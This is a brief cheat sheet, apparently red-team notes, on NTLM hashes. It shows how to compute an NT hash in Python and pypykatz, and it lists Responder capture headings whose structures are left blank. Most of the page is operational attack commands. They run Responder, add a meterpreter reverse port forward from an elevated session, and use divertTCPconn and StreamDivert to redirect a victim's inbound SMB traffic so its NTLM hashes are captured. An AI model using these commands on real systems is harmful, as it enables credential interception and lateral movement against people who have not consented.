NT / LM Hashes

Calculate NTLM

With Python:

>>> import hashlib
>>> hashlib.new('md4', 'Passw0rd!'.encode('utf-16le')).hexdigest()

With Pypykatz:

$ pypykatz crypto nt 'Passw0rd!'

Responder Capture Structure

[SMB] NTLMv1 Hash and [SMB] NTLMv1-SSP Hash capture structure:


[SMB] NTLMv2-SSP Hash capture structure:


Capture NTLM on Windows


Divert incoming SMB traffic on Victim to Victim's local port 8445, sent it through a reverse-forwarded port (meterpreter session must be elevated) to Attacker's local 445 port and capture the hashes with Responder:

$ sudo ./Responder.py -I eth0 -Av
meterpreter > portfwd add -R -L -l 445 -p 8445
meterpreter > execute -f divertTCPconn.exe -a "445 8445"


Divert all inbound TCP connections to port 445 (SMB) coming from to port 445:

Cmd > powershell -c "Add-Content conf.txt 'tcp < 445 -> 445'"
Cmd > .\StreamDivert.exe .\conf.txt -f -v

Last updated